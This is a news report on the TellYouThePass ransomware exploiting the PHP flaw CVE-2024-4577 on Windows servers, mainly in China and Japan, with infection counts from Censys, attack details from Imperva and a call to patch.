Security researchers have identified a ransomware strain known as TellYouThePass that has quickly taken advantage of a critical vulnerability in the PHP programming language. This vulnerability, designated as CVE-2024-4577, allows attackers to execute malicious code on web servers by converting user-supplied input into characters that pass malicious commands.

As of Thursday, security firm Censys reported that their internet scans had detected 1,000 servers infected with the TellYouThePass ransomware. This number had decreased from 1,800 servers that were initially detected on Monday. Primarily located in China, these infected servers no longer display their normal content, but instead show the site's file directory with all files encrypted and given a ".locked" extension.

The ransom note accompanying the encrypted files demands a payment of approximately $6,500 in exchange for the decryption key. Researchers speculate that the attackers are targeting servers in China and Japan because these locales appear to be the only ones confirmed to be vulnerable to the exploit.

The critical vulnerability was published on June 6, along with a security patch, but threat actors were quick to exploit it. Security firm Imperva reported that within 24 hours of the publication, exploits using the vulnerability were installing the TellYouThePass ransomware. The exploit utilized a Windows binary called mshta.exe to run an HTML application hosted on an attacker-controlled server, indicating a tactic known as "living off the land," where attackers blend in with normal OS functionality.

Censys researchers noted a fluctuation in the number of infected sites since the attacks began on June 7. The count ranged from a low of 670 to a high of 1,800 infected servers on Monday. The researchers believe that the varying numbers may be due to some of the compromised servers going offline or being decommissioned. They also mentioned that there have been no observed ransom payments to the Bitcoin address listed in the ransom notes.

Surprisingly, a significant number of compromised servers were found to be running XAMPP, a software not recommended for production systems. XAMPP maintainers explicitly state that their software is unsuitable for such environments. Researchers estimate that approximately half of the compromised servers show signs of running XAMPP, but the actual number may be higher as not all services explicitly disclose the software they use.

While XAMPP is the only platform confirmed to be vulnerable, security experts emphasize that all Windows systems running PHP should install the necessary security update immediately. To assist administrators, the Imperva post provides IP addresses, file names, and file hashes that can be used to identify potential targets of the attacks.

As the TellYouThePass ransomware continues to affect servers in China and Japan, it serves as a stark reminder of the importance of promptly addressing critical vulnerabilities and implementing security updates to protect against malicious attacks.